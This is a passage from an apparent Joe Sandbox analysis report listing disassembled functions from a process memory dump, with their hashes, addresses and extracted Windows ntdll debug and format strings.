                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 5eda4956ff42e2166f1dae632c00caf4ebe3cf9071258457bebf4572d05f041a
                                                                                                                                      • Instruction ID: af75ebe6ec7392e2597f0865d4f10f2c6d8d2028bf86cbef047b4af47994da79
                                                                                                                                      • Opcode Fuzzy Hash: 5eda4956ff42e2166f1dae632c00caf4ebe3cf9071258457bebf4572d05f041a
                                                                                                                                      • Instruction Fuzzy Hash: B990023224180403E1007158881470B100597D1302F95C012A1564555DC7298A516671
                                                                                                                                      Function 01002FA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: ecea51aa66a7b84644f4274f5864c852a5ea7bd7fd42dcc47370ea883093deee
                                                                                                                                      • Instruction ID: 8ada0f09c2a23585c2baeaac7273fd0076ed91415764bc69557bec467e51feae
                                                                                                                                      • Opcode Fuzzy Hash: ecea51aa66a7b84644f4274f5864c852a5ea7bd7fd42dcc47370ea883093deee
                                                                                                                                      • Instruction Fuzzy Hash: 5790023224180403E10071588808747100597D1302F95C012A5564555EC769CA916631
                                                                                                                                      Function 01002FB0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 03e7b21ba3273fcca4d32c60fecb2fa17a91d6bd4ee9eeed86c4fdfd29fe9dba
                                                                                                                                      • Instruction ID: 3db9e8c7ad7aee82f24ea3b2aa122608f47a2a6f69ef00a4895c5ca61996bae2
                                                                                                                                      • Opcode Fuzzy Hash: 03e7b21ba3273fcca4d32c60fecb2fa17a91d6bd4ee9eeed86c4fdfd29fe9dba
                                                                                                                                      • Instruction Fuzzy Hash: 819002226414004351407168C8449065005BBE2211795C122A0D98550DC65D8A655765
                                                                                                                                      Function 01002FE0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: c35bfea344daa5a6d37bfa7307674a8723b7f0191154258643231d1ca525a02c
                                                                                                                                      • Instruction ID: 5b4410fe2cbdd4752b30764ace02502d0fe2488b903989fc2b93a413bb545021
                                                                                                                                      • Opcode Fuzzy Hash: c35bfea344daa5a6d37bfa7307674a8723b7f0191154258643231d1ca525a02c
                                                                                                                                      • Instruction Fuzzy Hash: 17900222251C0043E20075688C14B07100597D1303F95C116A0554554CCA198A615621
                                                                                                                                      Function 01002E30 Relevance: .0, Instructions: 4COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 9780119973fb9eb1a83a22b3de0db3020558a43e7193189deddff4a889d907f5
                                                                                                                                      • Instruction ID: 4627decc6690da315f2c96c43966387ba76c066756ff2a003beac94800a1334d
                                                                                                                                      • Opcode Fuzzy Hash: 9780119973fb9eb1a83a22b3de0db3020558a43e7193189deddff4a889d907f5
                                                                                                                                      • Instruction Fuzzy Hash: FA90022234140403E102715884146061009D7D2345FD5C013E1824555DC7298B53A232
                                                                                                                                      Function 01002E80 Relevance: .0, Instructions: 4COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 342978b00627d61aa29b6dd4ddcc0a8a5cb832686f05e0415fdbf9ed0c7ac46f
                                                                                                                                      • Instruction ID: 4fca418e3e45eb63e5d21da2c1830dc1d640abafc421886eb11e66ae0d3a2848
                                                                                                                                      • Opcode Fuzzy Hash: 342978b00627d61aa29b6dd4ddcc0a8a5cb832686f05e0415fdbf9ed0c7ac46f
                                                                                                                                      • Instruction Fuzzy Hash: AA90022264140503E10171588404616100A97D1241FD5C023A1424555ECB298B92A231
                                                                                                                                      Function 01002EA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 51c363b59784de214544e132bf74338645f79ea486017a6cb6eb18604f19fdfd
                                                                                                                                      • Instruction ID: 7fbc42e9f976144135cb0eec3f516d3fc6392fe9a45f7199d5afb1564aad576d
                                                                                                                                      • Opcode Fuzzy Hash: 51c363b59784de214544e132bf74338645f79ea486017a6cb6eb18604f19fdfd
                                                                                                                                      • Instruction Fuzzy Hash: 9E90027224140403E14071588404746100597D1301F95C012A5464554EC75D8FD56765
                                                                                                                                      Function 01002EE0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 991419882472f1ce1d392543afdd657af622a08247a707e227161af4208c18a5
                                                                                                                                      • Instruction ID: a4b807e389d0f68eac7c44ff45ef38902ad7aff29b652a64fc4aa9598554c88e
                                                                                                                                      • Opcode Fuzzy Hash: 991419882472f1ce1d392543afdd657af622a08247a707e227161af4208c18a5
                                                                                                                                      • Instruction Fuzzy Hash: DB90026224180403E14075588804607100597D1302F95C012A2464555ECB2D8E516235
                                                                                                                                      Function 01003010 Relevance: .0, Instructions: 4COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: d6c4955b8826edb83c84491fc09ea8426877be4f6dd18cb9e78d9c243970ba6e
                                                                                                                                      • Instruction ID: ec0abc1e0ba0ab897d0c1a7c339a5993e49ef32d4e2dc975e764c7cfcda0c6cd
                                                                                                                                      • Opcode Fuzzy Hash: d6c4955b8826edb83c84491fc09ea8426877be4f6dd18cb9e78d9c243970ba6e
                                                                                                                                      • Instruction Fuzzy Hash: CB90022224184443E14072588804B0F510597E2202FD5C01AA4556554CCA198A555721
                                                                                                                                      Function 01003090 Relevance: .0, Instructions: 4COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 08ac3328ea81d67ed5789c44b7905bd8e092873b5db4837a106093d9d642f72f
                                                                                                                                      • Instruction ID: 91df885994ac0907e0b8a2fd791c1acb4f5812b104963ea7c82613adcfd91f5a
                                                                                                                                      • Opcode Fuzzy Hash: 08ac3328ea81d67ed5789c44b7905bd8e092873b5db4837a106093d9d642f72f
                                                                                                                                      • Instruction Fuzzy Hash: C690022228140803E1407158C4147071006D7D1601F95C012A0424554DC71A8B6567B1
                                                                                                                                      Function 010039B0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 001938932b819823815d02bdae6fe51a842723722cec79dbb34238ed5715fae2
                                                                                                                                      • Instruction ID: 09df49b35b49e1cd85a1ba097c6eb2c7b1ca9000c8df8694aeb000c39457a93b
                                                                                                                                      • Opcode Fuzzy Hash: 001938932b819823815d02bdae6fe51a842723722cec79dbb34238ed5715fae2
                                                                                                                                      • Instruction Fuzzy Hash: 9190022228545103E150715C84046165005B7E1201F95C022A0C14594DC6598A556321
                                                                                                                                      Function 01003D10 Relevance: .0, Instructions: 4COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 943244b1159bc396cd4f504a9a3b8330f6e054407f9db3ac1f394597a8a4e9dc
                                                                                                                                      • Instruction ID: d2934f4e7af944fdca078d94c19632be417246ea043b0b50c28759956e781e3e
                                                                                                                                      • Opcode Fuzzy Hash: 943244b1159bc396cd4f504a9a3b8330f6e054407f9db3ac1f394597a8a4e9dc
                                                                                                                                      • Instruction Fuzzy Hash: 2E90023224240143A54072589804A4E510597E2302BD5D416A0415554CCA188A615321
                                                                                                                                      Function 01003D70 Relevance: .0, Instructions: 4COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 85e1fe93237e9c480742626141d614c6d0a2c477c6aef9486d3e3db674d95435
                                                                                                                                      • Instruction ID: d3da9d9624a3f8f9d41185e55879e15269b9b5847308fd7a59552ed946828974
                                                                                                                                      • Opcode Fuzzy Hash: 85e1fe93237e9c480742626141d614c6d0a2c477c6aef9486d3e3db674d95435
                                                                                                                                      • Instruction Fuzzy Hash: 0F90023624140403E51071589804646104697D1301F95D412A0824558DC7588AA1A221
                                                                                                                                      Function 01002C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                      • Instruction ID: 7c6e4eb642b1beed932b668faf487b3d2c5d9932007d902659835a5b7087c683
                                                                                                                                      • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                                      Function 01002890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ___swprintf_l
                                                                                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                      • API String ID: 48624451-2108815105
                                                                                                                                      • Opcode ID: 5a5b9a33cee7dd400b862b76674008544d56cd9859527c4ee9eb72a14bc4b298
                                                                                                                                      • Instruction ID: e5386a3667f30a78e714aacacfff4ce0dc409cda7ec82dda380de06e995ea567
                                                                                                                                      • Opcode Fuzzy Hash: 5a5b9a33cee7dd400b862b76674008544d56cd9859527c4ee9eb72a14bc4b298
                                                                                                                                      • Instruction Fuzzy Hash: 8D51F9B5B04116BFEB12DB9C888497EFBF8BB48240B108269F5D5D7685D734DF408BA0
                                                                                                                                      Function 01072410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ___swprintf_l
                                                                                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                      • API String ID: 48624451-2108815105
                                                                                                                                      • Opcode ID: 2711dff12c423492b2e905dca78af8a5eec1e2f94549aa42d2e7eb286643fe3a
                                                                                                                                      • Instruction ID: 18cc35eaef0803187d529dd810773b0c2ce1bd5bb8fbdacd283971f18ae7ef36
                                                                                                                                      • Opcode Fuzzy Hash: 2711dff12c423492b2e905dca78af8a5eec1e2f94549aa42d2e7eb286643fe3a
                                                                                                                                      • Instruction Fuzzy Hash: 2D510971E00645AEDB70DF5CC8909BFBBF8EF44200B448459F5D6D7685DA74EA40CB64
                                                                                                                                      Function 00FF7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 01034787
                                                                                                                                      • ExecuteOptions, xrefs: 010346A0
                                                                                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01034655
                                                                                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01034725
                                                                                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 010346FC
                                                                                                                                      • Execute=1, xrefs: 01034713
                                                                                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01034742
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                      • API String ID: 0-484625025
                                                                                                                                      • Opcode ID: 0e153fdcff2e1fddb280f8d23fcab8cf9c4b07400902e83888760769cfc1146c
                                                                                                                                      • Instruction ID: 770d2b2d71ffb47c352030e87b0b8ea04a54be5f34b4e0781c5448d9fab06f77
                                                                                                                                      • Opcode Fuzzy Hash: 0e153fdcff2e1fddb280f8d23fcab8cf9c4b07400902e83888760769cfc1146c
                                                                                                                                      • Instruction Fuzzy Hash: 6B512972A0431D6AEB11BBA4DC85FF9B7A8FF18310F1400A9E605EB1E1E7719E41AF51
                                                                                                                                      Function 01096940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                                                      • Instruction ID: a019d7358cba2b294e82e1cb889910a1dd3cc5cdebcd812884b1d79618ad05d7
                                                                                                                                      • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                                                      • Instruction Fuzzy Hash: BD022571508342AFDB45DF18C4A0AAFBBE5EFC8700F04896DF9994B264DB32E945DB42
                                                                                                                                      Function 0100B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __aulldvrm
                                                                                                                                      • String ID: +$-$0$0
                                                                                                                                      • API String ID: 1302938615-699404926
                                                                                                                                      • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                      • Instruction ID: 6c44e47c0227558fa0135fbb7b317a27bf42721255ea647c308b98f3dd0a8b1b
                                                                                                                                      • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                      • Instruction Fuzzy Hash: 3181B078E052498EFF6A8E6CC8507FEBBF1BF45320F184599D8E5A72D1C6348941CB51
                                                                                                                                      Function 010720E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ___swprintf_l
                                                                                                                                      • String ID: %%%u$[$]:%u
                                                                                                                                      • API String ID: 48624451-2819853543
                                                                                                                                      • Opcode ID: b58fb7abef3ec2f2a3d942848ddb989efa355b0866427ccbf2f08fd21485f696
                                                                                                                                      • Instruction ID: 75264043d9a4463eddc4557cb08d60f75f446de758cd2bf67cf6cfa56ca68d1e
                                                                                                                                      • Opcode Fuzzy Hash: b58fb7abef3ec2f2a3d942848ddb989efa355b0866427ccbf2f08fd21485f696
                                                                                                                                      • Instruction Fuzzy Hash: 9921837AE00159ABDB11DE69DC50AEE7BF8EF64640F044156E985D3240EB30DA418BA5
                                                                                                                                      Function 00FEF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 010302BD
                                                                                                                                      • RTL: Re-Waiting, xrefs: 0103031E
                                                                                                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 010302E7
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                      • API String ID: 0-2474120054
                                                                                                                                      • Opcode ID: 0e58805b7aeb8ff1a7f0fe3e8509b8ac8cd352c646be1b58fc30f260cc5e9145
                                                                                                                                      • Instruction ID: ef6a604e7ab4560f4218aff1747d3c0a92555cb8bd0fbf6c9925eef672dd3641
                                                                                                                                      • Opcode Fuzzy Hash: 0e58805b7aeb8ff1a7f0fe3e8509b8ac8cd352c646be1b58fc30f260cc5e9145
                                                                                                                                      • Instruction Fuzzy Hash: D7E11F31608781DFE725CF29C884B2AB7E4BF84324F244A6DF5A58B2E1D774D948DB42
                                                                                                                                      Function 00FFBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      • RTL: Resource at %p, xrefs: 01037B8E
                                                                                                                                      • RTL: Re-Waiting, xrefs: 01037BAC
                                                                                                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01037B7F
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                      • API String ID: 0-871070163
                                                                                                                                      • Opcode ID: b0d5a86375a29f5355b4b0d3cd222bf1959c06d8d59a5d71967f19431d279da8
                                                                                                                                      • Instruction ID: 27476df52279aa8aff63ef65da8458d5394de9dc0598ab449f12b5e021d13398
                                                                                                                                      • Opcode Fuzzy Hash: b0d5a86375a29f5355b4b0d3cd222bf1959c06d8d59a5d71967f19431d279da8
                                                                                                                                      • Instruction Fuzzy Hash: 8A4103757047078FD724DE29CC40BBAB7E5EF98720F100A2DEA969B2D0DB70E8059B91
                                                                                                                                      Function 00FFB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0103728C
                                                                                                                                      Strings
                                                                                                                                      • RTL: Resource at %p, xrefs: 010372A3
                                                                                                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01037294
                                                                                                                                      • RTL: Re-Waiting, xrefs: 010372C1
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                      • API String ID: 885266447-605551621
                                                                                                                                      • Opcode ID: 78aeea23f2d4286d89a7a519190ad93c5ceb4f3587675464131b272ce486ad34
                                                                                                                                      • Instruction ID: 0abac69ef90372cf548d948db0e7ba208ee89e911a4aa0d19b016ce736526c99
                                                                                                                                      • Opcode Fuzzy Hash: 78aeea23f2d4286d89a7a519190ad93c5ceb4f3587675464131b272ce486ad34
                                                                                                                                      • Instruction Fuzzy Hash: CB4115B2700207ABD721DE29CD41FAAB7E5FF95720F140619F995EB280DB31E8429BD1
                                                                                                                                      Function 01072300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ___swprintf_l
                                                                                                                                      • String ID: %%%u$]:%u
                                                                                                                                      • API String ID: 48624451-3050659472
                                                                                                                                      • Opcode ID: 8b166357dd92d656e2d794242daa0dbeb1458795bea05dcedd46fb3c897f02d4
                                                                                                                                      • Instruction ID: 20e92ba812f11b00af39cab95c8695b200280503f25960ddb61cdadde9ed967e
                                                                                                                                      • Opcode Fuzzy Hash: 8b166357dd92d656e2d794242daa0dbeb1458795bea05dcedd46fb3c897f02d4
                                                                                                                                      • Instruction Fuzzy Hash: 0E318472E002199FDB60DF2DCC40BEEB7F8EB44610F454596E989E3240EB30EA448FA5
                                                                                                                                      Function 01007D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __aulldvrm
                                                                                                                                      • String ID: +$-
                                                                                                                                      • API String ID: 1302938615-2137968064
                                                                                                                                      • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                      • Instruction ID: 91d2dbbcd0ff77e6671774606ef1e8dceee0c42af4ec7a7f20c6b1c739fcdb04
                                                                                                                                      • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                      • Instruction Fuzzy Hash: 3B919F71E0021A9AFB66DF6DC8806BEBBE5BF44320F14855EE9D5A72C0D738AD408B51
                                                                                                                                      Function 00FC9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
